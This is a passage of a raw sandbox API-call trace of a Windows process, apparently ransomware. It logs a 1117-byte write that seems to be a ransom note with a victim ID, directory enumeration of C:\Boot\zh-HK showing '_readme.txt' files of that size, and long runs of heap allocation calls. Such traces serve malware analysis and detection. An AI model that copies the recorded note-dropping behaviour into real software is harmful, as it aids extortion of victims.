ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned 1117 [0056.358] WriteFile (in: hFile=0x5c8, lpBuffer=0x326aa18*, nNumberOfBytesToWrite=0x45d, lpNumberOfBytesWritten=0x9f4fb64, lpOverlapped=0x0 | out: lpBuffer=0x326aa18*, lpNumberOfBytesWritten=0x9f4fb64*=0x45d, lpOverlapped=0x0) returned 1 [0056.358] CloseHandle (hObject=0x5c8) returned 1 [0056.359] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326aa18 | out: hHeap=0x660000) returned 1 [0056.359] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5e2e0 | out: hHeap=0x660000) returned 1 [0056.359] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c82710 | out: hHeap=0x660000) returned 1 [0056.359] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.359] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.359] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ecc2910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ecc2910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.359] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.359] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ecc2910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ecc2910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.359] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0056.359] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ecc2910, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ecc2910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ecc2910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0056.359] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ecc2910, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ecc2910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ecc2910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0056.359] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.359] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.359] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eef0 | out: hHeap=0x660000) returned 1 [0056.359] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eef0 [0056.359] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.359] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.359] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.359] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.359] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.359] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.359] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.359] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.360] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.360] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.360] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.360] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.360] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.360] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.360] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.360] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.360] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.360] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.360] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.360] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.360] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.360] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.360] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.360] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.361] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.361] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.361] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.361] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.361] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.361] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.361] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.361] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.361] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.361] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.361] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.361] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.361] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.361] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.361] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.361] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.361] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.361] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.362] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.362] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.362] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.362] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.362] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.362] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.362] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.362] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.362] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.362] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.362] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.362] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.362] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.362] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.362] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.362] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.363] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.363] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.363] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.363] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.363] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.363] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.363] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.363] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.363] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.363] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.363] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.363] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.363] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.363] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.363] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.363] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.363] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.364] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.364] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.364] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.364] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.364] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.364] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.364] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.364] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.364] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.364] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.364] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.364] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.364] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.364] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.364] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.364] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.364] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.364] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.364] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.364] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.364] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.364] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.364] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.364] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.364] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.364] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.364] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.364] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.364] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.364] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.364] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.364] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.364] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.365] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.365] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.365] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.365] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.365] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.365] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.365] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.365] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.365] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.365] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.365] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.365] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.365] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.365] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.365] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.365] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.366] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.366] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.366] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.366] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: 